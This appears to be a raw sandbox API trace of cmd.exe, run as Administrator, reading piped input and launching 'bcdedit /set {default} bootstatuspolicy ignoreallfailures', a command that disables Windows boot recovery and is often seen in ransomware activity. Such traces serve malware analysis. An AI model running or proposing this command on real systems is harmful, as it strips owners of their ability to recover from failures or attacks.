[0212.779] _get_osfhandle (_FileHandle=0) returned 0x9c [0212.779] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0212.779] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0212.779] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e362, cchWideChar=1 | out: lpWideCharStr="pt\n") returned 1 [0212.779] _get_osfhandle (_FileHandle=0) returned 0x9c [0212.779] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0212.779] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0212.779] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e364, cchWideChar=1 | out: lpWideCharStr="o\n") returned 1 [0212.779] _get_osfhandle (_FileHandle=0) returned 0x9c [0212.779] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0212.779] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0212.779] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e366, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0212.779] _get_osfhandle (_FileHandle=0) returned 0x9c [0212.779] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0212.779] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0212.779] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e368, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0212.779] _get_osfhandle (_FileHandle=0) returned 0x9c [0212.779] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0212.779] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0212.779] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e36a, cchWideChar=1 | out: lpWideCharStr="c") returned 1 [0212.779] _get_osfhandle (_FileHandle=0) returned 0x9c [0212.779] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0212.779] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0212.779] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e36c, cchWideChar=1 | out: lpWideCharStr="y") returned 1 [0212.780] _get_osfhandle (_FileHandle=0) returned 0x9c [0212.780] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0212.780] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0212.780] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e36e, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0212.780] _get_osfhandle (_FileHandle=0) returned 0x9c [0212.780] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0212.780] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0212.780] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e370, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0212.780] _get_osfhandle (_FileHandle=0) returned 0x9c [0212.781] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0212.781] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0212.781] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e372, cchWideChar=1 | out: lpWideCharStr="g") returned 1 [0212.781] _get_osfhandle (_FileHandle=0) returned 0x9c [0212.781] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0212.781] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0212.781] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e374, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0212.781] _get_osfhandle (_FileHandle=0) returned 0x9c [0212.781] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0212.781] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0212.781] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e376, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0212.781] _get_osfhandle (_FileHandle=0) returned 0x9c [0212.781] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0212.781] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0212.782] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e378, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0212.782] _get_osfhandle (_FileHandle=0) returned 0x9c [0212.782] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0212.782] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0212.782] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e37a, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0212.782] _get_osfhandle (_FileHandle=0) returned 0x9c [0212.782] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0212.782] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0212.782] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e37c, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0212.782] _get_osfhandle (_FileHandle=0) returned 0x9c [0212.782] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0212.782] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0212.782] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e37e, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0212.782] _get_osfhandle (_FileHandle=0) returned 0x9c [0212.782] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0212.782] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0212.782] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e380, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0212.782] _get_osfhandle (_FileHandle=0) returned 0x9c [0212.782] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0212.782] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0212.782] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e382, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0212.782] _get_osfhandle (_FileHandle=0) returned 0x9c [0212.782] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0212.782] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0212.782] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e384, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0212.782] _get_osfhandle (_FileHandle=0) returned 0x9c [0212.782] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0212.782] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0212.782] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e386, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0212.782] _get_osfhandle (_FileHandle=0) returned 0x9c [0212.782] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0212.782] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0212.782] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e388, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0212.783] _get_osfhandle (_FileHandle=0) returned 0x9c [0212.783] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0212.783] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0212.783] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e38a, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0212.783] _get_osfhandle (_FileHandle=0) returned 0x9c [0212.783] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0212.783] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0212.783] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e38c, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0212.783] _get_osfhandle (_FileHandle=0) returned 0x9c [0212.783] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0212.783] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0212.783] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e38e, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0212.783] _get_osfhandle (_FileHandle=0) returned 0x9c [0212.783] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0212.783] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0212.783] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e390, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0212.783] _get_osfhandle (_FileHandle=0) returned 0x9c [0212.783] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0212.783] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0212.783] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e392, cchWideChar=1 | out: lpWideCharStr="\n") returned 1 [0212.783] _get_osfhandle (_FileHandle=0) returned 0x9c [0212.783] GetFileType (hFile=0x9c) returned 0x3 [0212.783] _get_osfhandle (_FileHandle=0) returned 0x9c [0212.783] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0212.783] _get_osfhandle (_FileHandle=1) returned 0xa8 [0212.783] GetFileType (hFile=0xa8) returned 0x3 [0212.783] _get_osfhandle (_FileHandle=1) returned 0xa8 [0212.783] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="bcdedit /set {default} bootstatuspolicy ignoreallfailures\n", cchWideChar=-1, lpMultiByteStr=0x4ab4c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bcdedit /set {default} bootstatuspolicy ignoreallfailures\n", lpUsedDefaultChar=0x0) returned 59 [0212.783] WriteFile (in: hFile=0xa8, lpBuffer=0x4ab4c320*, nNumberOfBytesToWrite=0x3a, lpNumberOfBytesWritten=0x1efb98, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesWritten=0x1efb98*=0x3a, lpOverlapped=0x0) returned 1 [0212.783] GetProcessHeap () returned 0x2e0000 [0212.783] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x4012) returned 0x300e70 [0212.784] GetProcessHeap () returned 0x2e0000 [0212.784] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x300e70 | out: hHeap=0x2e0000) returned 1 [0212.784] GetProcessHeap () returned 0x2e0000 [0212.784] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0xb0) returned 0x2f97c0 [0212.784] GetProcessHeap () returned 0x2e0000 [0212.784] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x20) returned 0x2f4610 [0212.784] GetProcessHeap () returned 0x2e0000 [0212.784] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x76) returned 0x2f99d0 [0212.785] GetConsoleOutputCP () returned 0x1b5 [0212.785] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ab4bfe0 | out: lpCPInfo=0x4ab4bfe0) returned 1 [0212.785] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0212.785] GetConsoleTitleW (in: lpConsoleTitle=0x1efb50, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 0x2a [0212.785] GetProcessHeap () returned 0x2e0000 [0212.785] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x218) returned 0x2faa10 [0212.785] GetProcessHeap () returned 0x2e0000 [0212.785] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x86) returned 0x2f9480 [0212.785] GetProcessHeap () returned 0x2e0000 [0212.785] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x420) returned 0x2e1320 [0212.785] SetErrorMode (uMode=0x0) returned 0x0 [0212.785] SetErrorMode (uMode=0x1) returned 0x0 [0212.786] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x2e1330, lpFilePart=0x1ef3e0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x1ef3e0*="system32") returned 0x13 [0212.786] SetErrorMode (uMode=0x0) returned 0x1 [0212.786] GetProcessHeap () returned 0x2e0000 [0212.786] RtlReAllocateHeap (Heap=0x2e0000, Flags=0x0, Ptr=0x2e1320, Size=0x48) returned 0x2e1320 [0212.786] GetProcessHeap () returned 0x2e0000 [0212.786] RtlSizeHeap (HeapHandle=0x2e0000, Flags=0x0, MemoryPointer=0x2e1320) returned 0x48 [0212.786] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4ab3f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0212.786] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0212.786] GetProcessHeap () returned 0x2e0000 [0212.786] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x104) returned 0x2f5b70 [0212.786] GetProcessHeap () returned 0x2e0000 [0212.786] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x1f8) returned 0x2f9be0 [0212.786] GetProcessHeap () returned 0x2e0000 [0212.786] RtlReAllocateHeap (Heap=0x2e0000, Flags=0x0, Ptr=0x2f9be0, Size=0x106) returned 0x2f9be0 [0212.786] GetProcessHeap () returned 0x2e0000 [0212.786] RtlSizeHeap (HeapHandle=0x2e0000, Flags=0x0, MemoryPointer=0x2f9be0) returned 0x106 [0212.786] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4ab3f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0212.786] GetProcessHeap () returned 0x2e0000 [0212.786] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0xe8) returned 0x2f9d00 [0212.786] GetProcessHeap () returned 0x2e0000 [0212.786] RtlReAllocateHeap (Heap=0x2e0000, Flags=0x0, Ptr=0x2f9d00, Size=0x7e) returned 0x2f9d00 [0212.786] GetProcessHeap () returned 0x2e0000 [0212.786] RtlSizeHeap (HeapHandle=0x2e0000, Flags=0x0, MemoryPointer=0x2f9d00) returned 0x7e [0212.786] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0212.786] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x1ef150, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ef150) returned 0x2f5c80 [0212.786] FindClose (in: hFindFile=0x2f5c80 | out: hFindFile=0x2f5c80) returned 1 [0212.786] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bcdedit.COM", fInfoLevelId=0x1, lpFindFileData=0x1ef150, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ef150) returned 0xffffffffffffffff [0212.787] GetLastError () returned 0x2 [0212.787] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bcdedit.EXE", fInfoLevelId=0x1, lpFindFileData=0x1ef150, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ef150) returned 0x2f5c80 [0212.787] FindClose (in: hFindFile=0x2f5c80 | out: hFindFile=0x2f5c80) returned 1 [0212.787] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0212.787] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0212.787] GetConsoleTitleW (in: lpConsoleTitle=0x1ef6a0, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 0x2a [0212.789] GetProcessHeap () returned 0x2e0000 [0212.789] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x21c) returned 0x2e1380 [0212.789] GetConsoleTitleW (in: lpConsoleTitle=0x2e1390, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 0x2a [0212.789] GetProcessHeap () returned 0x2e0000 [0212.789] RtlReAllocateHeap (Heap=0x2e0000, Flags=0x0, Ptr=0x2e1380, Size=0xec) returned 0x2e1380 [0212.789] GetProcessHeap () returned 0x2e0000 [0212.789] RtlSizeHeap (HeapHandle=0x2e0000, Flags=0x0, MemoryPointer=0x2e1380) returned 0xec [0212.789] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe - bcdedit /set {default} bootstatuspolicy ignoreallfailures") returned 1 [0212.790] GetProcessHeap () returned 0x2e0000 [0212.790] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2e1380 | out: hHeap=0x2e0000) returned 1 [0212.790] InitializeProcThreadAttributeList (in: lpAttributeList=0x1ef458, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1ef418 | out: lpAttributeList=0x1ef458, lpSize=0x1ef418) returned 1 [0212.790] UpdateProcThreadAttribute (in: lpAttributeList=0x1ef458, dwFlags=0x0, Attribute=0x60001, lpValue=0x1ef408, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1ef458, lpPreviousValue=0x0) returned 1 [0212.790] GetStartupInfoW (in: lpStartupInfo=0x1ef570 | out: lpStartupInfo=0x1ef570*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x9c, hStdOutput=0xa8, hStdError=0xa8)) [0212.790] GetProcessHeap () returned 0x2e0000 [0212.790] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x20) returned 0x2f4640 [0212.790] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0212.790] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0212.790] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0212.790] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0212.790] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0212.790] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0212.790] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0212.790] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0212.790] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 